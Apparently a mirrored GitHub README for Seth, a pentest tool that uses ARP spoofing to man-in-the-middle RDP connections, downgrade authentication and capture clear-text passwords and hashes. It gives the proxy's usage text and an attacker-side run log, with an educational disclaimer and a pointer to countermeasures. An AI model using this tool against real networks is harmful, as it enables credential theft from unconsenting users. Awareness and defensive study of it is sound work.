PACEJJ27 / Seth

Perform a MitM attack and extract clear text credentials from RDP connections

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool


Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks.


Run it like this:


This script performs ARP spoofing to gain a Man-in-the-Middle position and redirects the traffic such that it runs through an RDP proxy. The proxy can be called separately:

$ ./ -h
usage: [-h] [-d] [-p LISTEN_PORT] [-b BIND_IP]
                           [-g {0,1,3,11}] -c CERTFILE -k KEYFILE
                           target_host [target_port]

RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017

positional arguments:
  target_host           target host of the RDP service
  target_port           TCP port of the target RDP service (default 3389)

optional arguments:
  -h, --help            show this help message and exit
  -d, --debug           show debug information
  -p LISTEN_PORT, --listen-port LISTEN_PORT
                        TCP port to listen on (default 3389)
  -b BIND_IP, --bind-ip BIND_IP
                        IP address to bind the fake service to (default all)
  -g {0,1,3,11}, --downgrade {0,1,3,11}
                        downgrade the authentication protocol to this (default
  -c CERTFILE, --certfile CERTFILE
                        path to the certificate file
  -k KEYFILE, --keyfile KEYFILE
                        path to the key file

For more information read the PDF in doc/paper (or read the code!). The paper also contains recommendations for counter measures.


The following ouput shows the attacker's view. Seth sniffs an offline crackable hash as well as the clear text password. Here, NLA is not enforced and the victim ignored the certificate warning. The client is Windows 7 and the Server Windows 10.

# ./ eth1 192.168.57.{103,2,102}
███████╗███████╗████████╗██╗  ██╗
██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer
███████╗█████╗     ██║   ███████║
╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017
███████║███████╗   ██║   ██║  ██║
╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝
[*] Spoofing arp replies...
[*] Turning on IP forwarding...
[*] Set iptables rules for SYN packets...
[*] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is
[*] Clone the x509 certificate of the original destination...
[*] Adjust the iptables rule for all packets...
[*] Run RDP proxy...
Connection received from
Downgrading authentication options from 11 to 3
Enable SSL
Tamper with NTLM response
TLS alert access denied, Downgrading CredSSP
Waiting for connection
Connection received from
Enable SSL
Connection lost
Waiting for connection
Connection received from
Enable SSL
Hiding forged protocol request from client
Keyboard layout/type/subtype: 0x20409/0x7/0x0
Key release:                 Tab
^C[*] Cleaning up...
[*] Done.


Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only.


Perform a MitM attack and extract clear text credentials from RDP connections

License:MIT License


Language:Python 78.0%Language:Shell 22.0%